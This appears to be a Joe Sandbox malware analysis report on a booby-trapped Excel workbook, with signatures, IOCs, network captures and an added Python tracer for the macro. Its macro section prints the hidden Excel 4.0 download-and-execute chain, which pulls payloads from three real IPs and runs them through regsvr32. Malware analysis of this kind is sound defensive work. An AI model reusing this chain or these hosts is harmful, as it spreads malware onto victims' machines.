Windows Analysis Report ClaimCopy-1848214335-12022021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
Jbx Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal |
Source: | File opened |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: | Process created |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded |
Further signature sources, grouped by evidence type in report order (the signature headings for these groups are not preserved in this copy): |
Source: | TCP traffic | 2 entries |
Source: | HTTP traffic detected | 6 entries |
Source: | TCP traffic detected without corresponding DNS query | 25 entries |
Source: | String found in binary or memory | 4 entries |
Source: | HTTP traffic detected | 6 entries |
Source: | String found in binary or memory | 25 entries |
Source: | File created | 1 entry |
Source: | HTTP traffic detected | 6 entries |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR | 3 entries |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample |
Found protected and hidden Excel 4.0 Macro sheet |
Source: | Initial sample |
Further signature sources, grouped by evidence type in report order (signature headings not preserved in this copy): |
Source: | Macro extractor | 2 entries |
Source: | Code function | 6 entries |
Source: | Virustotal | 1 entry |
Source: | Key opened | 1 entry |
Source: | Process created | 13 entries |
Source: | Binary or memory string | 1 entry |
Source: | File created | 2 entries |
Source: | Classification label: mal76.expl.evad.winXLSB@13/5@0/3 |
Source: | File read | 1 entry |
Source: | Window detected | 1 entry |
Source: | Initial sample | 4 entries |
Source: | Key opened | 1 entry |
Source: | File opened | 1 entry |
Source: | Process information set | 16 entries |
Source: | Thread sleep time | 3 entries |
Source: | Code function | 1 entry |
Source: | Code function | 1 entry |
Source: | Binary or memory string | 3 entries |
Mitre Att&ck Matrix |
---|
Techniques with at least one matching signature; the number in parentheses is the match count shown as a superscript in the original matrix. |
Tactic | Techniques observed |
---|---|
Execution | Scripting (2), Exploitation for Client Execution (22) |
Privilege Escalation | Process Injection (2) |
Defense Evasion | Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Process Injection (2), Scripting (2) |
Discovery | Security Software Discovery (1), Virtualization/Sandbox Evasion (1), Process Discovery (1), File and Directory Discovery (1), System Information Discovery (2) |
Collection | Archive Collected Data (1) |
Command and Control | Encrypted Channel (1), Ingress Tool Transfer (4), Non-Application Layer Protocol (2), Application Layer Protocol (12) |
The Initial Access, Persistence, Credential Access, Lateral Movement, Exfiltration and Impact columns, and the mobile-only Network Effects and Remote Service Effects columns, list only the matrix's default placeholder techniques (Valid Accounts, Path Interception, OS Credential Dumping, Remote Services and so on) with no match for this sample. |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
ClaimCopy-1848214335-12022021.xlsb | 9% | Virustotal | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
18 URLs checked (the URL strings are not preserved in this copy), all at 0% detection and labelled safe: 12 by Avira URL Cloud, 6 by URL Reputation. |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
6 URLs (strings not preserved in this copy), each Malicious: false, reputation unknown. |
URLs from Memory and Binaries |
---|
19 URLs (strings not preserved in this copy), all Malicious: false; reputation high for 7, low for 2, unknown for 10. |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false |
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false |
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false |
All three addresses were contacted directly over TCP port 80 with no preceding DNS query (there are no contacted domains), and they are the three hosts hard-coded in the Excel 4.0 macro's download formulas in the Macro 4.0 Code section. |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532757 |
Start date: | 02.12.2021 |
Start time: | 17:19:36 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | ClaimCopy-1848214335-12022021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:20:45 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Previously analysed samples | Detection |
---|---|---|
45.142.211.62 | 3 | malicious |
158.69.133.78 | 3 | malicious |
No prior context is listed for 185.82.126.78. The sample names and SHA-256 values of the related analyses are not preserved in this copy. |
Domains |
---|
No context |
---|
ASN |
---|
Match | Previously analysed samples | Detection |
---|---|---|
RACKTECHRU | 20 | malicious |
OVHFR | 20 | malicious |
Although the Contacted IPs table marks all three addresses Malicious: false, two of them and both of their ASNs already appear in earlier malicious analyses; for triage, weight the prior context over the per-IP flag. |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Five files, all written by C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; file names and file types are not preserved in this copy. |
File 1 |
---|
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
File 2 |
---|
Category: | dropped |
Size (bytes): | 99419 |
Entropy (8bit): | 7.830672226396987 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUyRwk:I3c6EehCfCZpUHKGXbBKsiip |
MD5: | B2341D56AF5EF9A35E595C7B5B7378FF |
SHA1: | F07ADA669C9C00167F18C2FC2C23F0EB73D90073 |
SHA-256: | 98462FE70DDA1E4D3601ADC6F7E1BB5D73BB9ED615B8B70C9966B36BD6845D38 |
SHA-512: | A2ED4FD7496371D0E9C5527F7969BE6C6C2F2D5371BDCADEEB35FE0A712E310C4AD6DC05F5B3FE1FD9F235306196987F0037B577D6937E6899C133F06106DB11 |
Malicious: | false |
File 3 |
---|
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
File 4 (identical to File 2) |
---|
Category: | dropped |
Size (bytes): | 99419 |
Entropy (8bit): | 7.830672226396987 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUyRwk:I3c6EehCfCZpUHKGXbBKsiip |
MD5: | B2341D56AF5EF9A35E595C7B5B7378FF |
SHA1: | F07ADA669C9C00167F18C2FC2C23F0EB73D90073 |
SHA-256: | 98462FE70DDA1E4D3601ADC6F7E1BB5D73BB9ED615B8B70C9966B36BD6845D38 |
SHA-512: | A2ED4FD7496371D0E9C5527F7969BE6C6C2F2D5371BDCADEEB35FE0A712E310C4AD6DC05F5B3FE1FD9F235306196987F0037B577D6937E6899C133F06106DB11 |
Malicious: | true |
File 5 |
---|
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Files 2 and 4 are byte-identical (same size, SSDEEP and all four hashes) yet carry opposite Malicious flags; treat them as one artefact and take the verdict from the hash, not from the flag. Their SSDEEP and that of File 1 share the long core block (B5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU) with the submitted sample's SSDEEP in the Static File Info section, so all three are near-copies of the workbook rather than content fetched from the three hosts, every request to which returned 403. |
Static File Info |
---|
General | |
---|---|
Entropy (8bit): | 7.831014565818071 |
File name: | ClaimCopy-1848214335-12022021.xlsb |
File size: | 99677 |
MD5: | 08dbf91f6a89fdb8dcd18dfe657147f3 |
SHA1: | 990b5abe4b156c201174e412aca4b3dcb372070c |
SHA256: | 29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267 |
SHA512: | e2b04a6f333013fbd641d32f1abb99ec92d30a38d8685a83801d8f75627ba4e3d35cf261aec6cf2100d9bc23e8aeb6cd735104855309b46a82c7546eca83944b |
SSDEEP: | 1536:xMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:dc6EehCfCZpUHKGXbBKsiiOp |
File Content Preview: | PK..........!...~.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
The preview starts with the ZIP signature PK, as expected: an .xlsb is a ZIP-based Office Open XML package whose worksheet and macro-sheet parts are binary records rather than XML, and the Excel 4.0 macro shown below lives in such a macro-sheet part, not in a VBA project. |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-1848214335-12022021.xlsb" |
---|
The indicator values (Summary Info, Application Name, Encrypted Document, the Word/Workbook/PowerPoint/Visio/ObjectPool stream flags, Flash Objects Count, Contains VBA Macros) are not preserved in this copy. |
Macro 4.0 Code |
---|
Two Excel 4.0 macro sheets, dumped by the extractor as row,col,content triples (the original report prints each sheet on a single line; here one Tiposa1 cell per line and the Tiposa cells grouped by row):
Sheet Tiposa1, column 6: the download-and-execute chain
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx")
23,6,=HALT()
Sheet Tiposa: the data cells the chain references, interleaved with filler values
1,1,523
4,9,34543 4,12,43
5,2,ui 5,9,7 5,14,43
6,14,36
7,0,ug 7,1,еу5цу5
8,9,34 8,10,5
9,1,y 9,16,346
10,7,rt 10,8,345 10,9,u
11,2,23 11,7,ertertyh57s5ry 11,11,5 11,12,35
12,1,65 12,2,7 12,9,r67
13,2,mfy 13,7,65 13,10,7 13,14,34 13,15,543
14,0,uh 14,1,y
15,0,7 15,7,65 15,10,ae46
16,2,d7 16,3,uRl
17,3,="Mon" 17,9,dt 17,10,6 17,12,u 17,13,5
18,3,="URLDownloadTo" 18,8,yu 18,10,sb 18,14,5
19,3,="JJCCBB" 19,7,f
20,0,7 20,1,7 20,4,185.82.126.78/ 20,7,523 20,8,u
21,0,md 21,4,158.69.133.78/ 21,6,=RANDBETWEEN(142536473,988879789754) 21,9,s 21,11,m
22,1,7 22,4,45.142.211.62/ 22,6,=".dat" 22,8,6
23,4,45.142.211.62/ 23,6,=".dat2" 23,11,4 23,15,46
24,4,185.82.126.78/ 24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) 24,8,23 24,14,6 24,15,43
25,1,567 25,4,158.69.133.78/ 25,10,23 25,13,5
28,2,756
37,6,=GOTO(Tiposa1!G8)
How the references resolve, assuming the extractor's row and column indices are zero-based so that (16,3) is D17 (the only reading under which the REGISTER call builds a valid DLL name): D17&D18 = "uRlMon", D19&"FileA" = "URLDownloadToFileA" and D20 = "JJCCBB" is the REGISTER type string, so G25 registers urlmon!URLDownloadToFileA under the alias Drozd. E21..E26 hold each of the three hosts twice (185.82.126.78/, 158.69.133.78/, 45.142.211.62/), G22 is a RANDBETWEEN() value used as the file name, and G23/G24 are the extensions ".dat" and ".dat2". The six Drozd() calls therefore fetch one http://<host>/<random>.dat and one http://<host>/<random>.dat2 from each host into C:\ProgramData\Volet1.ocx through Volet6.ocx, which matches the two HTTP requests per host in the capture, and the six EXEC() calls hand each file to regsvr32. In the last three EXEC() strings the text &Tiposa!G22& sits inside the quoted literal, so regsvr32 receives it verbatim as -i:&Tiposa!G22& rather than the random number. The remaining cells (523, ui, еу5цу5, ertertyh57s5ry and so on) are filler that never feeds the chain.
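The dump is hard to read because the API name and every URL are assembled at run time from scattered cells. The script below is an added example (mine, not part of the Joe Sandbox report) that loads the cells the formulas reference, replays the REGISTER call to learn what the alias Drozd stands for, and then walks the Tiposa1 column to recover the six download URLs and six regsvr32 commands. Assumptions: the extractor's row and column indices are zero-based ((16,3) is D17); RANDBETWEEN is replaced by the fixed placeholder `<rand>`; the Auto_Open entry point and the GOTO in Tiposa!G38 are not emulated, the walk simply evaluates the REGISTER cell and then Tiposa1 column G from the top; and the evaluator understands only strings, numbers, cell references, `&` concatenation (translated to Python `+`, sufficient here because every operand is text) and function calls, which is all these formulas use.

```python
import re

# Cells copied from the report's "Macro 4.0 Code" dump in the extractor's own
# "row,col,content" layout (whitespace separates cells; content may contain spaces).
# Only the cells the formulas reference are kept. Assumption: indices are zero-based,
# so (16,3) is D17, the only mapping under which REGISTER(D17&D18,D19&"FileA",...)
# yields "uRlMon" / "URLDownloadToFileA".
DUMPS = {
    "Tiposa1": r'''
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx") 16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx") 23,6,=HALT()''',
    "Tiposa": r'''16,3,uRl 17,3,="Mon" 18,3,="URLDownloadTo" 19,3,="JJCCBB"
20,4,185.82.126.78/ 21,4,158.69.133.78/ 22,4,45.142.211.62/
23,4,45.142.211.62/ 24,4,185.82.126.78/ 25,4,158.69.133.78/
21,6,=RANDBETWEEN(142536473,988879789754) 22,6,=".dat" 23,6,=".dat2"
24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9)''',
}
# Token classes: string literal, [Sheet!]A1 reference, function call, number, punctuation.
TOKEN = re.compile(r'"([^"]*)"|([A-Za-z_]\w*!)?([A-Z]+\d+)|([A-Za-z_]\w*)\(|(\d+)|([&,()])')


def load_cells():  # (sheet, A1 name) -> raw cell content
    cells = {}
    for sheet, dump in DUMPS.items():
        for item in re.split(r"\s+(?=\d+,\d+,)", dump.strip()):
            row, col, content = item.split(",", 2)
            cells[(sheet, f"{chr(65 + int(col))}{int(row) + 1}")] = content
    return cells


def to_python(sheet, text):
    """Translate one XLM formula body into a Python expression over cell() and fn()."""
    if not re.fullmatch(f"(?:{TOKEN.pattern})*", text):
        raise ValueError(f"unsupported formula syntax: {text!r}")  # nothing else reaches eval()
    out, prev = [], "("
    for t in TOKEN.finditer(text):
        kind = t.group(6) or ("(" if t.group(4) else "v")
        if kind == "," and prev in ",(":
            out.append("None")  # empty argument, as in REGISTER(...,"Drozd",,1,9)
        if t.group(1) is not None:
            out.append(repr(t.group(1)))
        elif t.group(3):
            out.append(f"cell({(t.group(2)[:-1] if t.group(2) else sheet)!r},{t.group(3)!r})")
        elif t.group(4):
            out.append(f"fn({t.group(4)!r})(")
        elif t.group(5):
            out.append(t.group(5))
        else:
            out.append("+" if kind == "&" else kind)  # '&' is XLM string concatenation
        prev = kind
    return "".join(out)


class Evaluator:
    def __init__(self, cells):
        self.cells, self.registered, self.calls = cells, {}, []

    def cell(self, sheet, name):  # value of a cell, evaluating formulas recursively
        content = self.cells.get((sheet, name), "")
        if not content.startswith("="):
            return content
        fn = lambda f: (lambda *a: self.call(f, list(a)))  # XLM call -> Evaluator.call
        return eval(to_python(sheet, content[1:]), {"__builtins__": {}, "cell": self.cell, "fn": fn})

    def call(self, name, args):
        if name == "RANDBETWEEN":
            return "<rand>"  # deterministic stand-in so the output is stable
        if name == "REGISTER":  # REGISTER(dll, export, type_text, alias, ...)
            self.registered[args[3]] = (args[0], args[1], args[2])
        if name in self.registered:  # call through the alias: report it as dll!export
            name = "!".join(self.registered[name][:2])
        self.calls.append((name, args))
        return name  # EXEC/HALT are only recorded, never executed


def trace():  # evaluate the REGISTER cell, then walk Tiposa1 column G until HALT
    ev = Evaluator(load_cells())
    ev.cell("Tiposa", "G25")
    for row in range(1, 40):
        if ev.cells.get(("Tiposa1", f"G{row}"), "").startswith("="):
            ev.cell("Tiposa1", f"G{row}")
            if ev.calls[-1][0] == "HALT":
                break
    return ev


def summary(ev):  # what the macro would download, and what it would run
    return {"alias": ev.registered,
            "downloads": [(a[1], a[2]) for n, a in ev.calls if n == "uRlMon!URLDownloadToFileA"],
            "exec": [a[0] for n, a in ev.calls if n == "EXEC"]}


if __name__ == "__main__":
    print(summary(trace()))
```

The output lists uRlMon!URLDownloadToFileA six times with the resolved URL and target path, then the six EXEC strings, the last three still carrying the literal &Tiposa!G22&. Translating to a Python expression and calling eval() is acceptable here only because to_python() refuses any text outside the five token classes; do not loosen that check for arbitrary samples without replacing eval() with a real parser.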
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-17:20:33.818022 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-17:20:34.462758 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
12/02/21-17:20:37.721969 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-17:20:37.918223 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-17:20:38.051804 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-17:20:43.124756 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Six 403 responses, two from each host, one per download formula in the macro (a .dat and a .dat2 request per host): none of the six downloads succeeded in this run, which is consistent with the empty Malware Configuration section and the Timeout stop reason.
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 17:20:33.611210108 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.678101063 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.678247929 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.678940058 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.745141983 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.818022013 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.818130016 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.840384960 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:33.947674990 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.947779894 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:33.948457956 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:34.055716991 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:34.462758064 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:34.462909937 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:34.480212927 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.489062071 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.526045084 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.526228905 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.526890993 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.563458920 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.721968889 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.722197056 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.728193045 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.764781952 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.918222904 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.918462038 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.920181036 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:37.984700918 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:38.051804066 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:38.052022934 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:38.055299044 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:38.162579060 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:43.124756098 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:43.124927044 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:21:42.917769909 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:21:42.917872906 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:21:43.058012962 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:21:43.058257103 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:21:48.124285936 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:21:48.124485970 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:22:30.290991068 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:22:30.291338921 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:22:30.291645050 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:22:30.327723026 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:22:30.357023954 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:22:30.398499966 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 185.82.126.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 17:20:33.678940058 CET | 0 | OUT | |
Dec 2, 2021 17:20:33.818022013 CET | 1 | IN | |
Dec 2, 2021 17:20:37.920181036 CET | 5 | OUT | |
Dec 2, 2021 17:20:38.051804066 CET | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 17:20:33.948457956 CET | 1 | OUT | |
Dec 2, 2021 17:20:34.462758064 CET | 2 | IN | |
Dec 2, 2021 17:20:38.055299044 CET | 7 | OUT | |
Dec 2, 2021 17:20:43.124756098 CET | 7 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 45.142.211.62 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 17:20:37.526890993 CET | 3 | OUT | |
Dec 2, 2021 17:20:37.721968889 CET | 4 | IN | |
Dec 2, 2021 17:20:37.728193045 CET | 4 | OUT | |
Dec 2, 2021 17:20:37.918222904 CET | 5 | IN |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
Start time | Start date | Path | Wow64 process (32bit) | Imagebase | File size | MD5 hash | Has elevated privileges | Has administrator privileges | Programmed in | Reputation |
---|---|---|---|---|---|---|---|---|---|---|
17:20:20 | 02/12/2021 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | false | 0x13ff60000 | 28253536 bytes | D53B85E21886D2AF9815C377537BCAC3 | true | true | C, C++ or other language | high |
17:20:34 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xff350000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
